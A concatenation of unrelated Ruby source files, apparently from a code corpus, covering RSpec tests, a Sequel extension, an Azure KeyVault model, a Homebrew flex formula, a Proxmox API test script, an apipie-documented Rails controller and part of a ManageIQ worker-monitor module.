allow(story).to receive_message_chain('target.has_image?') { false }
allow(story).to receive_message_chain('target.source') { nil }
allow(story).to receive_message_chain('target.content') { 'Block Content' }
comment_item = ArenaCommentedItem.new(story, @arena_url).block_title
expect(comment_item).to eq('Block Content')
end
it 'returns a block thumbnail' do
story = double('Block')
allow(story).to receive_message_chain('target.has_image?') { true }
allow(story).to receive_message_chain('target.image.display.url') { 'Image Link' }
comment_item = ArenaCommentedItem.new(story, @arena_url).block_thumb
expect(comment_item).to eq('Image Link')
end
it 'returns a link to commented block' do
story = double('Block')
allow(story).to receive_message_chain('target.has_image?') { false }
allow(story).to receive_message_chain('target.id') { 100 }
comment_item = ArenaCommentedItem.new(story, 'https://www.are.na/').block_link
expect(comment_item).to eq('https://www.are.na/block/100')
end
it 'returns an image for a commented block' do
story = double('Block')
allow(story).to receive_message_chain('target.has_image?') { true }
allow(story).to receive_message_chain('target.source.url') { 'https://wwww.block-source.com/source-url' }
comment_item = ArenaCommentedItem.new(story, @arena_url).block_link
expect(comment_item).to eq('https://wwww.block-source.com/source-url')
end
end
| 44.8 | 109 | 0.721726 |
87e24051b652aa39f074e57e987e4c227b7aa2a7 | 1,272 | # frozen-string-literal: true
#
# The any_not_empty extension changes the behavior of Dataset#any?
# if called without a block. By default, this method uses the
# standard Enumerable behavior of enumerating results and seeing
# if any result is not false or nil. With this extension, it
# just checks whether the dataset is empty. This approach can
# be much faster if the dataset is currently large.
#
# DB[:table].any?
# # SELECT * FROM table
#
# DB[:table].extension(:any_not_empty).any?
# # SELECT 1 as one FROM table LIMIT 1
#
# You can load this extension into specific datasets:
#
# ds = DB[:table]
# ds = ds.extension(:any_not_empty)
#
# Or you can load it into all of a database's datasets, which
# is probably the desired behavior if you are using this extension:
#
# DB.extension(:any_not_empty)
#
# Note that this can result in any? returning a different result if
# the dataset has a row_proc that can return false or nil.
#
# Related module: Sequel::AnyNotEmpty
#
module Sequel
module AnyNotEmpty
# If a block is not given, return whether the dataset is not empty.
def any?
if defined?(yield)
super
else
!empty?
end
end
end
Dataset.register_extension(:any_not_empty, AnyNotEmpty)
end
| 27.652174 | 71 | 0.709906 |
1a0f17040e76ad2573761ad3f75b684600a77917 | 3,230 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::KeyVault::V2015_06_01
module Models
#
# The certificate import parameters
#
class CertificateImportParameters
include MsRestAzure
# @return [String] Base64 encoded representation of the certificate
# object to import. This certificate needs to contain the private key.
attr_accessor :base64encoded_certificate
# @return [String] If the private key in base64EncodedCertificate is
# encrypted, the password used for encryption
attr_accessor :password
# @return [CertificatePolicy] The management policy for the certificate
attr_accessor :certificate_policy
# @return [CertificateAttributes] The attributes of the certificate
# (optional)
attr_accessor :certificate_attributes
# @return [Hash{String => String}] Application-specific metadata in the
# form of key-value pairs
attr_accessor :tags
#
# Mapper for CertificateImportParameters class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'CertificateImportParameters',
type: {
name: 'Composite',
class_name: 'CertificateImportParameters',
model_properties: {
base64encoded_certificate: {
client_side_validation: true,
required: true,
serialized_name: 'value',
type: {
name: 'String'
}
},
password: {
client_side_validation: true,
required: false,
serialized_name: 'pwd',
type: {
name: 'String'
}
},
certificate_policy: {
client_side_validation: true,
required: false,
serialized_name: 'policy',
type: {
name: 'Composite',
class_name: 'CertificatePolicy'
}
},
certificate_attributes: {
client_side_validation: true,
required: false,
serialized_name: 'attributes',
type: {
name: 'Composite',
class_name: 'CertificateAttributes'
}
},
tags: {
client_side_validation: true,
required: false,
serialized_name: 'tags',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
}
}
}
}
end
end
end
end
| 30.761905 | 77 | 0.514551 |
b90f059e6758a21f7430bfa1a1c3b217f1ad0fcb | 1,118 | require File.expand_path('../boot', __FILE__)
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module Scaffolding
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
# Do not swallow errors in after_commit/after_rollback callbacks.
config.active_record.raise_in_transactional_callbacks = true
end
end
| 41.407407 | 99 | 0.734347 |
08e1740022acb5c1f52eb611f7a9f97e37705666 | 1,764 | class Flex < Formula
desc "Fast Lexical Analyzer, generates Scanners (tokenizers)"
homepage "https://github.com/westes/flex"
url "https://github.com/westes/flex/releases/download/v2.6.4/flex-2.6.4.tar.gz"
sha256 "e87aae032bf07c26f85ac0ed3250998c37621d95f8bd748b31f15b33c45ee995"
bottle do
sha256 "0abf12786daea0fb1be796e24f41163f41943eb3dfb7ba71e4c09f1821083c11" => :high_sierra
sha256 "89fb9ae2ac9be0f60706f40379cdfa51ced78f1638ac8729bc0074e4fcde70cf" => :sierra
sha256 "95c2da56e5487b53ee4afe3ed52a7f59ffe86df4508768b3e48ef042d66e6cc1" => :el_capitan
sha256 "c8aaca29a77a6b3e2383f7d80b12eccbbf131162e5157a4a320117d4c564a4bf" => :yosemite
sha256 "428698b422383860d697f3ef5e5b91ffc4d0b390b29d5b0c5ab7faee67f299d2" => :x86_64_linux # glibc 2.19
end
keg_only :provided_by_osx, "some formulae require a newer version of flex"
depends_on "help2man" => :build
depends_on "gettext"
unless OS.mac?
depends_on "m4"
depends_on "bison" => :build
end
def install
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--enable-shared",
"--prefix=#{prefix}"
system "make", "install"
bin.install_symlink "flex" => "lex" unless OS.mac?
end
test do
(testpath/"test.flex").write <<~EOS
CHAR [a-z][A-Z]
%%
{CHAR}+ printf("%s", yytext);
[ \\t\\n]+ printf("\\n");
%%
int main()
{
yyin = stdin;
yylex();
}
EOS
system "#{bin}/flex", "test.flex"
system ENV.cc, "lex.yy.c", "-L#{lib}", "-lfl", "-o", "test"
assert_equal shell_output("echo \"Hello World\" | ./test"), <<~EOS
Hello
World
EOS
end
end
| 32.666667 | 107 | 0.646259 |
1cb3e9779ac443524d4aea91dfcd07d6957f4516 | 2,627 | require_relative 'shared_network_manager_context'
shared_examples :shared_examples_for_cloud_network_controller do |providers|
include CompressedIds
render_views
before :each do
stub_user(:features => :all)
setup_zone
end
providers.each do |t|
context "for #{t}" do
include_context :shared_network_manager_context, t
describe "#show_list" do
it "renders index" do
get :index
expect(response.status).to eq(302)
expect(response).to redirect_to(:action => 'show_list')
end
it "renders show_list" do
# TODO(lsmola) figure out why I have to mock pdf available here, but not in other Manager's lists
allow(PdfGenerator).to receive_messages(:available? => false)
session[:settings] = {:default_search => 'foo',
:views => {},
:perpage => {:list => 10}}
get :show_list
expect(response.status).to eq(200)
expect(response.body).to_not be_empty
end
end
describe "#show" do
it "renders show screen" do
get :show, :params => {:id => @cloud_network.id}
expect(response.status).to eq(200)
expect(response.body).to_not be_empty
expect(assigns(:breadcrumbs)).to eq([{:name => "cloud_networks",
:url => "/cloud_network/show_list?page=&refresh=y"},
{:name => "Cloud Network (Summary)",
:url => "/cloud_network/show/#{@cloud_network.id}"}])
is_expected.to render_template(:partial => "layouts/listnav/_cloud_network")
end
it "show associated cloud_subnets" do
# TODO: Fix
skip "Broken after adding network new/edit/delete"
assert_nested_list(@cloud_network, [@cloud_subnet], 'cloud_subnets', 'All Cloud Subnets')
end
it "show associated network routers" do
assert_nested_list(@cloud_network, [@network_router], 'network_routers', 'All Network Routers')
end
it "show associated instances" do
assert_nested_list(@cloud_network, [@vm], 'instances', 'All Instances', :child_path => 'vm_cloud')
end
end
describe "#test_toolbars" do
it 'edit Cloud Network tags' do
post :button, :params => {:miq_grid_checks => to_cid(@cloud_network.id), :pressed => "cloud_network_tag"}
expect(response.status).to eq(200)
end
end
end
end
end
| 36.486111 | 115 | 0.578607 |
61a17f9f4766172bff4e6399e08c88ecd2898e45 | 500 | # this is the gem version of the controller
class Spree::Api::BraintreeClientTokenController < Spree::Api::BaseController
skip_before_action :authenticate_user
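  # Generates a Braintree client token from the requested payment method,
  # falling back to the first active Braintree gateway.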
def create
if params[:payment_method_id]
gateway = Solidus::Gateway::BraintreeGateway.find_by!(id: params[:payment_method_id])
else
gateway = Solidus::Gateway::BraintreeGateway.find_by!(active: true)
end
render json: { client_token: gateway.generate_client_token, payment_method_id: gateway.id }
end
end
| 33.333333 | 95 | 0.76 |
91736d53894083744a93dd0155b60f175fbe2353 | 41 | module CheckMobi
VERSION = "1.0.5"
end
| 10.25 | 19 | 0.682927 |
383ee0d8575d1c57098a7ca727cdcead1a42551a | 4,250 | #!/usr/bin/env ruby
require 'test/unit'
require 'fileutils'
require 'rake'
require 'test/filecreation'
######################################################################
class TestFileTask < Test::Unit::TestCase
include Rake
include FileCreation
def setup
Task.clear
@runs = Array.new
FileUtils.rm_f NEWFILE
FileUtils.rm_f OLDFILE
end
def test_file_need
name = "testdata/dummy"
file name
ftask = Task[name]
assert_equal name.to_s, ftask.name
File.delete(ftask.name) rescue nil
assert ftask.needed?, "file should be needed"
open(ftask.name, "w") { |f| f.puts "HI" }
assert_equal nil, ftask.prerequisites.collect{|n| Task[n].timestamp}.max
assert ! ftask.needed?, "file should not be needed"
File.delete(ftask.name) rescue nil
end
def test_file_times_new_depends_on_old
create_timed_files(OLDFILE, NEWFILE)
t1 = Rake.application.intern(FileTask, NEWFILE).enhance([OLDFILE])
t2 = Rake.application.intern(FileTask, OLDFILE)
assert ! t2.needed?, "Should not need to build old file"
assert ! t1.needed?, "Should not need to rebuild new file because of old"
end
def test_file_times_old_depends_on_new
create_timed_files(OLDFILE, NEWFILE)
t1 = Rake.application.intern(FileTask,OLDFILE).enhance([NEWFILE])
t2 = Rake.application.intern(FileTask, NEWFILE)
assert ! t2.needed?, "Should not need to build new file"
preq_stamp = t1.prerequisites.collect{|t| Task[t].timestamp}.max
assert_equal t2.timestamp, preq_stamp
assert t1.timestamp < preq_stamp, "T1 should be older"
assert t1.needed?, "Should need to rebuild old file because of new"
end
def test_file_depends_on_task_depend_on_file
create_timed_files(OLDFILE, NEWFILE)
file NEWFILE => [:obj] do |t| @runs << t.name end
task :obj => [OLDFILE] do |t| @runs << t.name end
file OLDFILE do |t| @runs << t.name end
Task[:obj].invoke
Task[NEWFILE].invoke
assert ! @runs.include?(NEWFILE)
end
def test_existing_file_depends_on_non_existing_file
create_file(OLDFILE)
delete_file(NEWFILE)
file NEWFILE
file OLDFILE => NEWFILE
assert_nothing_raised do Task[OLDFILE].invoke end
end
# I have currently disabled this test. I'm not convinced that
# deleting the file target on failure is always the proper thing to
# do. I'm willing to hear input on this topic.
def ztest_file_deletes_on_failure
task :obj
file NEWFILE => [:obj] do |t|
FileUtils.touch NEWFILE
fail "Ooops"
end
assert Task[NEWFILE]
begin
Task[NEWFILE].invoke
rescue Exception
end
assert( ! File.exist?(NEWFILE), "NEWFILE should be deleted")
end
end
######################################################################
class TestDirectoryTask < Test::Unit::TestCase
include Rake
def setup
rm_rf "testdata", :verbose=>false
end
def teardown
rm_rf "testdata", :verbose=>false
end
def test_directory
desc "DESC"
directory "testdata/a/b/c"
assert_equal FileCreationTask, Task["testdata"].class
assert_equal FileCreationTask, Task["testdata/a"].class
assert_equal FileCreationTask, Task["testdata/a/b/c"].class
assert_nil Task["testdata"].comment
assert_equal "DESC", Task["testdata/a/b/c"].comment
assert_nil Task["testdata/a/b"].comment
verbose(false) {
Task['testdata/a/b'].invoke
}
assert File.exist?("testdata/a/b")
assert ! File.exist?("testdata/a/b/c")
end
def test_directory_win32
desc "WIN32 DESC"
FileUtils.mkdir_p("testdata")
Dir.chdir("testdata") do
directory 'c:/testdata/a/b/c'
assert_equal FileCreationTask, Task['c:/testdata'].class
assert_equal FileCreationTask, Task['c:/testdata/a'].class
assert_equal FileCreationTask, Task['c:/testdata/a/b/c'].class
assert_nil Task['c:/testdata'].comment
assert_equal "WIN32 DESC", Task['c:/testdata/a/b/c'].comment
assert_nil Task['c:/testdata/a/b'].comment
verbose(false) {
Task['c:/testdata/a/b'].invoke
}
assert File.exist?('c:/testdata/a/b')
assert ! File.exist?('c:/testdata/a/b/c')
end
end
end
| 30.357143 | 77 | 0.656235 |
7a34bc04c722199a2781e270d17d9745f22d6679 | 515 | module ActiveModel
module Serializable
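    # Serializes the object, wrapping it under its root key when one is present
    # and merging in root-embedded associations and any meta data.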
def as_json(options={})
if root = options.fetch(:root, json_key)
hash = { root => serializable_object }
hash.merge!(serializable_data)
hash
else
serializable_object
end
end
def serializable_data
embedded_in_root_associations.tap do |hash|
if respond_to?(:meta) && meta
hash[meta_key] = meta
end
end
end
def embedded_in_root_associations
{}
end
end
end
| 19.807692 | 49 | 0.605825 |
01e543385dfd77a838872c91b5ed0ba4f5a34212 | 1,731 | # frozen_string_literal: true
require "hanami/utils/basic_object"
module Platform
class Matcher
class Nope < Hanami::Utils::BasicObject
def or(other, &blk)
blk.nil? ? other : blk.call
end
# rubocop:disable Style/MethodMissingSuper
# rubocop:disable Style/MissingRespondToMissing
def method_missing(*)
self.class.new
end
# rubocop:enable Style/MissingRespondToMissing
# rubocop:enable Style/MethodMissingSuper
end
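    # Evaluates the block against the current platform; the first matching
    # clause throws :match with the result of its block.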
def self.match(&blk)
catch :match do
new.__send__(:match, &blk)
end
end
def self.match?(os: Os.current, ci: Ci.current, engine: Engine.current, db: Db.current)
catch :match do
new.os(os).ci(ci).engine(engine).db(db) { true }.or(false)
end
end
def initialize
freeze
end
def os(name, &blk)
return nope unless os?(name)
block_given? ? resolve(&blk) : yep
end
def ci(name, &blk)
return nope unless ci?(name)
block_given? ? resolve(&blk) : yep
end
def engine(name, &blk)
return nope unless engine?(name)
block_given? ? resolve(&blk) : yep
end
def db(name, &blk)
return nope unless db?(name)
block_given? ? resolve(&blk) : yep
end
def default(&blk)
resolve(&blk)
end
private
def match(&blk)
instance_exec(&blk)
end
def nope
Nope.new
end
def yep
self.class.new
end
def resolve
throw :match, yield
end
def os?(name)
Os.os?(name)
end
def ci?(name)
Ci.ci?(name)
end
def engine?(name)
Engine.engine?(name)
end
def db?(name)
Db.db?(name)
end
end
end
| 17.31 | 91 | 0.583478 |
ffbc2feab45cd10f89c320a3bbc163491c473d6a | 3,377 | # typed: true
# frozen_string_literal: true
require "cli/parser"
require "livecheck/livecheck"
module Homebrew
extend T::Sig
module_function
sig { returns(CLI::Parser) }
def bump_args
Homebrew::CLI::Parser.new do
description <<~EOS
Display out-of-date brew formulae and the latest version available.
Also displays whether a pull request has been opened with the URL.
EOS
flag "--limit=",
description: "Limit number of package results returned."
named_args :formula
end
end
def bump
args = bump_args.parse
requested_formulae = args.named.to_formulae.presence
requested_limit = args.limit.to_i if args.limit.present?
if requested_formulae
Livecheck.load_other_tap_strategies(requested_formulae)
requested_formulae.each_with_index do |formula, i|
puts if i.positive?
if formula.head_only?
ohai formula.name
puts "Formula is HEAD-only."
next
end
package_data = Repology.single_package_query(formula.name)
retrieve_and_display_info(formula, package_data&.values&.first)
end
else
outdated_packages = Repology.parse_api_response(requested_limit)
outdated_packages.each_with_index do |(_name, repositories), i|
puts if i.positive?
homebrew_repo = repositories.find do |repo|
repo["repo"] == "homebrew"
end
next if homebrew_repo.blank?
formula = begin
Formula[homebrew_repo["srcname"]]
rescue
next
end
retrieve_and_display_info(formula, repositories)
break if requested_limit && i >= requested_limit
end
end
end
def livecheck_result(formula)
skip_result = Livecheck::SkipConditions.skip_information(formula)
if skip_result.present?
return "#{skip_result[:status]}#{" - #{skip_result[:messages].join(", ")}" if skip_result[:messages].present?}"
end
version_info = Livecheck.latest_version(
formula,
json: true, full_name: false, verbose: false, debug: false,
)
latest = version_info[:latest] if version_info.present?
return "unable to get versions" if latest.blank?
latest.to_s
end
def retrieve_pull_requests(formula)
pull_requests = GitHub.fetch_pull_requests(formula.name, formula.tap&.full_name, state: "open")
if pull_requests.try(:any?)
pull_requests = pull_requests.map { |pr| "#{pr["title"]} (#{Formatter.url(pr["html_url"])})" }.join(", ")
end
return "none" if pull_requests.blank?
pull_requests
end
def retrieve_and_display_info(formula, repositories)
current_version = formula.stable.version.to_s
repology_latest = if repositories.present?
Repology.latest_version(repositories)
else
"not found"
end
livecheck_latest = livecheck_result(formula)
pull_requests = retrieve_pull_requests(formula)
title = if current_version == repology_latest &&
current_version == livecheck_latest
"#{formula} is up to date!"
else
formula.name
end
ohai title
puts <<~EOS
Current formula version: #{current_version}
Latest Repology version: #{repology_latest}
Latest livecheck version: #{livecheck_latest}
Open pull requests: #{pull_requests}
EOS
end
end
| 26.590551 | 117 | 0.670121 |
21e1f8902d12fb47e9a7462840a13a489e8c29f6 | 143 | class Object
def initialize
end
private :initialize
def __fixnum__
Ruby.primitive :object_is_fixnum
kind_of? Fixnum
end
end
| 13 | 36 | 0.734266 |
18a4e77f4a3c087cb3bdd7c56b96705f6070453b | 250 | module Zetto::Storage::Connect
require "redis"
module RedisSingelton
    @redis = Redis.new((Zetto::Config::Params.redis_connect || {}).merge({:driver => :hiredis}))
class << self
def get
@redis
end
end
end
end
| 13.888889 | 95 | 0.6 |
1a6b1d8eed3db5e3a5ba296f1e834242c133be43 | 2,609 | # Proxmox API Tests
#
# Author: Jorge Juan Moratilla Porras
#
# Description: some tests with the Proxmox VE API
#require 'rubygems'
require 'rest_client'
require 'json'
require 'pp'
require 'colorize'
# Default values
@username = ENV['PVE_USER_NAME'] || 'test'
@realm = ENV['PVE_REALM'] || 'pve'
@password = ENV['PVE_USER_PASSWORD'] || 'test123'
@url_base = ENV['PVE_CLUSTER_URL'] || 'https://localhost:8006/api2/json/'
@nodename = ENV['PVE_NODE_NAME'] || 'localhost'
@storagename = ENV['PVE_STORAGE_NAME'] || 'local'
csrf_prevention_token = nil
token = nil
# RestClient logger
log = RestClient.log = []
puts "
SERVER INFO:
PVE_CLUSTER_URL => #{@url_base}
PVE_NODE_NAME => #{@nodename}
PVE_USER_NAME => #{@username}
PVE_REALM => #{@realm}
PVE_STORAGE_NAME => #{@storagename}
"
@site = RestClient::Resource.new(@url_base)
puts 'AUTH'.blue
print ' To request access: '.yellow
@site['access/ticket'].post :username=>@username,:realm=>@realm,:password=>@password do |response, request, result, &block|
if response.code == 200 then
data = JSON.parse(response.body)
ticket = data['data']['ticket']
csrf_prevention_token = data['data']['CSRFPreventionToken']
if !ticket.nil? then
# Token is a cookie coded like this one
# 'PVEAuthCookie=PVE%3Atest@pve%3A5079E676%3A%3AE5Btg[...]crcp/RzEitO/vKMvr5YpAmjBRw7HS2IA3Q%3D%3D'
token = 'PVEAuthCookie=' + ticket.gsub!(/:/,'%3A').gsub!(/=/,'%3D')
end
end
puts "#{response.code}"
end
@auth_params = {
:CSRFPreventionToken => csrf_prevention_token,
:cookie => token
}
puts 'GET'.blue
# server_get_address: Returns the IP Address of the machine to chef
def server_get_data(vmid,field)
@site["nodes/#{@nodename}/openvz/#{vmid}/status/current"].get @auth_params do |response, request, result, &block|
data = (field.match("all"))?JSON.parse(response.body)['data'] : JSON.parse(response.body)['data'][field]
end
end
# vmid_to_server_name: Use the id of the server to get the name
def vmid_to_server_name(vmid)
puts 'in vmid_to_server'
@site['cluster/resources?type=vm'].get @auth_params do |response, request, result, &block|
data = JSON.parse(response.body)['data']
puts 'received body'
result = nil
data.each {|entry|
if entry['vmid'].to_i == vmid.to_i then
result = entry['name']
end
}
result
end
end
puts 'Get IP Address: '.yellow
puts "Enter the vmid of the server"
vmid = gets.chomp
puts "Enter the field to get (all for all)"
field = gets.chomp
pp "#{vmid}: #{server_get_data(vmid,field)}"
pp "#{vmid}: #{vmid_to_server_name(vmid)}"
| 27.177083 | 124 | 0.68302 |
6aeec2d06f6daa8711a1fb4286a8b2897b673664 | 1,169 | require 'spec_helper'
describe "An object with RDF backed attributes" do
before do
class TestOne < ActiveFedora::Base
class MyMetadata < ActiveFedora::NtriplesRDFDatastream
Deprecation.silence(ActiveFedora::RDFDatastream) do
property :title, predicate: ::RDF::Vocab::DC.title do |index|
index.as :stored_searchable
end
property :date_uploaded, predicate: ::RDF::Vocab::DC.dateSubmitted do |index|
index.type :date
index.as :stored_searchable, :sortable
end
end
end
has_metadata 'descMetadata', type: MyMetadata
Deprecation.silence(ActiveFedora::Attributes) do
has_attributes :title, :date_uploaded, datastream: 'descMetadata'
end
end
end
after do
Object.send(:remove_const, :TestOne)
end
it "is able to grab the solr name" do
expect(TestOne.delegated_attributes[:title].primary_solr_name).to eq 'desc_metadata__title_tesim'
end
it "is able to grab the solr name for a date" do
expect(TestOne.delegated_attributes[:date_uploaded].primary_solr_name).to eq 'desc_metadata__date_uploaded_dtsim'
end
end
| 32.472222 | 117 | 0.694611 |
2171c8fe55366219d05abe04f039fa90267bdb9f | 11,432 | class UsersController < ApplicationController
resource_description do
short 'Site members'
path '/users'
formats ['json']
param :id, Fixnum, :desc => "User ID", :required => false
param :legacy_param, Hash, :desc => 'Deprecated parameter not documented', :show => false, :required => false do
param :resource_param, Hash, :desc => 'Param description for all methods' do
param :ausername, String, :desc => "Username for login", :required => true
param :apassword, String, :desc => "Password for login", :required => true
end
end
api_version "development"
error 404, "Missing", :meta => {:some => "metadata"}
error 500, "Server crashed for some <%= reason %>"
meta :new_style => true, :author => { :name => 'John', :surname => 'Doe' }
description <<-EOS
== Long description
Example resource for rest api documentation
These can now be accessed in <tt>shared/header</tt> with:
Headline: <%= headline %>
First name: <%= person.first_name %>
If you need to find out whether a certain local variable has been assigned a value in a particular render call,
you need to use the following pattern:
<% if local_assigns.has_key? :headline %>
Headline: <%= headline %>
<% end %>
Testing using <tt>defined? headline</tt> will not work. This is an implementation restriction.
=== Template caching
By default, Rails will compile each template to a method in order to render it. When you alter a template,
Rails will check the file's modification time and recompile it in development mode.
EOS
header :CommonHeader, 'Common header description', required: true
end
description <<-eos
= Action View Base
Action View templates can be written in several ways. If the template file has a <tt>.erb</tt> extension then it uses a mixture of ERb
(included in Ruby) and HTML. If the template file has a <tt>.builder</tt> extension then Jim Weirich's Builder::XmlMarkup library is used.
== ERB
You trigger ERB by using embeddings such as <% %>, <% -%>, and <%= %>. The <%= %> tag set is used when you want output. Consider the
following loop for names:
<b>Names of all the people</b>
<% @people.each do |person| %>
Name: <%= person.name %><br/>
<% end %>
The loop is setup in regular embedding tags <% %> and the name is written using the output embedding tag <%= %>. Note that this
is not just a usage suggestion. Regular output functions like print or puts won't work with ERB templates. So this would be wrong:
<%# WRONG %>
Hi, Mr. <% puts "Frodo" %>
If you absolutely must write from within a function use +concat+.
<%- and -%> suppress leading and trailing whitespace, including the trailing newline, and can be used interchangeably with <% and %>.
=== Using sub templates
Using sub templates allows you to sidestep tedious replication and extract common display structures in shared templates. The
classic example is the use of a header and footer (even though the Action Pack-way would be to use Layouts):
<%= render "shared/header" %>
Something really specific and terrific
<%= render "shared/footer" %>
As you see, we use the output embeddings for the render methods. The render call itself will just return a string holding the
result of the rendering. The output embedding writes it to the current template.
But you don't have to restrict yourself to static includes. Templates can share variables amongst themselves by using instance
variables defined using the regular embedding tags. Like this:
<% @page_title = "A Wonderful Hello" %>
<%= render "shared/header" %>
Now the header can pick up on the <tt>@page_title</tt> variable and use it for outputting a title tag:
<title><%= @page_title %></title>
=== Passing local variables to sub templates
You can pass local variables to sub templates by using a hash with the variable names as keys and the objects as values:
<%= render "shared/header", { :headline => "Welcome", :person => person } %>
These can now be accessed in <tt>shared/header</tt> with:
Headline: <%= headline %>
First name: <%= person.first_name %>
If you need to find out whether a certain local variable has been assigned a value in a particular render call,
you need to use the following pattern:
<% if local_assigns.has_key? :headline %>
Headline: <%= headline %>
<% end %>
Testing using <tt>defined? headline</tt> will not work. This is an implementation restriction.
=== Template caching
By default, Rails will compile each template to a method in order to render it. When you alter a template,
Rails will check the file's modification time and recompile it in development mode.
== Builder
Builder templates are a more programmatic alternative to ERB. They are especially useful for generating XML content. An XmlMarkup object
named +xml+ is automatically made available to templates with a <tt>.builder</tt> extension.
Here are some basic examples:
xml.em("emphasized") # => <em>emphasized</em>
xml.em { xml.b("emph & bold") } # => <em><b>emph & bold</b></em>
xml.a("A Link", "href" => "http://onestepback.org") # => <a href="http://onestepback.org">A Link</a>
xml.target("name" => "compile", "option" => "fast") # => <target option="fast" name="compile"\>
# NOTE: order of attributes is not specified.
Any method with a block will be treated as an XML markup tag with nested markup in the block. For example, the following:
xml.div do
xml.h1(@person.name)
xml.p(@person.bio)
end
would produce something like:
<div>
<h1>David Heinemeier Hansson</h1>
<p>A product of Danish Design during the Winter of '79...</p>
</div>
A full-length RSS example actually used on Basecamp:
xml.rss("version" => "2.0", "xmlns:dc" => "http://purl.org/dc/elements/1.1/") do
xml.channel do
xml.title(@feed_title)
xml.link(@url)
xml.description "Basecamp: Recent items"
xml.language "en-us"
xml.ttl "40"
@recent_items.each do |item|
xml.item do
xml.title(item_title(item))
xml.description(item_description(item)) if item_description(item)
xml.pubDate(item_pubDate(item))
xml.guid(@person.firm.account.url + @recent_items.url(item))
xml.link(@person.firm.account.url + @recent_items.url(item))
xml.tag!("dc:creator", item.author_name) if item_has_creator?(item)
end
end
end
end
More builder documentation can be found at http://builder.rubyforge.org.
eos
api :GET, "/users/:id", "Show user profile"
show false
formats ['json', 'jsonp']
error 401, "Unauthorized"
error :code => 404, :description => "Not Found"
param :id, Integer, :desc => "user id", :required => true
param :session, String, :desc => "user is logged in", :required => true, :missing_message => lambda { "session_parameter_is_required" }
param :regexp_param, /^[0-9]* years/, :desc => "regexp param"
param :regexp2, /\b[A-Z0-9._%+-=]+@[A-Z0-9.-]+.[A-Z]{2,}\b/i, :desc => "email regexp"
param :array_param, ["100", "one", "two", "1", "2"], :desc => "array validator"
param :boolean_param, [true, false], :desc => "array validator with boolean"
param :proc_param, lambda { |val|
val == "param value" ? true : "The only good value is 'param value'."
}, :desc => "proc validator"
param :briefer_dsl, String, "You dont need :desc => from now"
param :meta_param, String, :desc => "A parameter with some additional metadata", :meta => [:some, :more, :info]
meta :success_message => "Some message"
param :hash_param, Hash, :desc => "Hash param" do
param :dummy_hash, Hash do
param :dummy_2, String, :required => true
end
end
def show
unless params[:session] == "secret_hash"
render :plain => "Not authorized", :status => 401
return
end
unless params[:id].to_i == 5
render :plain => "Not Found", :status => 404 and return
end
render :plain => "OK"
end
def_param_group :credentials do
param :name, String, :desc => "Username for login", :required => true
param :pass, String, :desc => "Password for login", :required => true
end
def_param_group :user do
param :user, Hash, :desc => "User info", :required => true, :action_aware => true do
param_group :credentials
param :membership, ["standard","premium"], :desc => "User membership", :allow_nil => false
end
end
api :POST, "/users", "Create user"
param_group :user
param :user, Hash do
param :permalink, String
end
param :facts, Hash, :desc => "Additional optional facts about the user", :allow_nil => true
param :age, :number, :desc => "Age is just a number", :allow_blank => true
error :unprocessable_entity, 'Unprocessable Entity'
def create
render :plain => "OK #{params.inspect}"
end
api :PUT, "/users/:id", "Update an user"
param_group :user
param :comments, Array do
param :comment, String
end
def update
render :plain => "OK #{params.inspect}"
end
api :POST, "/users/admin", "Create admin user"
param_group :user, :as => :create
def admin_create
render :plain => "OK #{params.inspect}"
end
api :GET, "/users", "List users"
error :code => 401, :desc => "Unauthorized"
error :code => 404, :desc => "Not Found"
desc "List all users."
param :oauth, nil,
:desc => "Hide this global param (eg dont need auth here)"
def index
render :plain => "List of users"
end
api :GET, '/company_users', 'Get company users'
api :GET, '/company/:id/users', 'Get users working in given company'
param :id, Integer, :desc => "Company ID"
def two_urls
render :plain => 'List of users'
end
api :GET, '/users/see_another', 'Boring method'
show false
see 'development#users#create'
see 'development#users#index', "very interesting method reference"
desc 'This method is boring, look at users#create. It is hidden from documentation.'
def see_another
render :plain => 'This is very similar to create action'
end
api :GET, '/users/by_department', 'show users from a specific department'
param :department, ["finance", "operations", "sales", "marketing", "HR"], required: false, default_value: "sales"
def get_by_department
render :plain => 'nothing to see here'
end
api :GET, '/users/desc_from_file', 'desc from file'
document 'users/desc_from_file.md'
def desc_from_file
render :plain => 'document from file action'
end
api! 'Create user'
param_group :user
param :user, Hash do
param :permalink, String
end
param :facts, Hash, :desc => "Additional optional facts about the user", :allow_nil => true
def create_route
end
api :GET, '/users/action_with_headers'
header :RequredHeaderName, 'Required header description', required: true
header :OptionalHeaderName, 'Optional header description', required: false, type: 'string'
def action_with_headers
end
end
| 38.362416 | 142 | 0.649493 |
791140f5555255ef6fab38f1e6ace991b351a98e | 6,525 | module MiqServer::WorkerManagement::Monitor
extend ActiveSupport::Concern
include_concern 'Kill'
include_concern 'Kubernetes'
include_concern 'Quiesce'
include_concern 'Reason'
include_concern 'Settings'
include_concern 'Start'
include_concern 'Status'
include_concern 'Stop'
include_concern 'Systemd'
include_concern 'SystemLimits'
include_concern 'Validation'
def monitor_workers
# Clear the my_server cache so we can detect role and possibly other changes faster
self.class.my_server_clear_cache
sync_from_system
sync_monitor
# Sync the workers after sync'ing the child worker settings
sync_workers
MiqWorker.status_update_all
cleanup_failed_workers
monitor_active_workers
do_system_limit_exceeded if self.kill_workers_due_to_resources_exhausted?
end
def worker_not_responding(w)
msg = "#{w.format_full_log_msg} being killed because it is not responding"
_log.warn(msg)
MiqEvent.raise_evm_event_queue(w.miq_server, "evm_worker_killed", :event_details => msg, :type => w.class.name)
w.kill
end
def sync_workers
result = {}
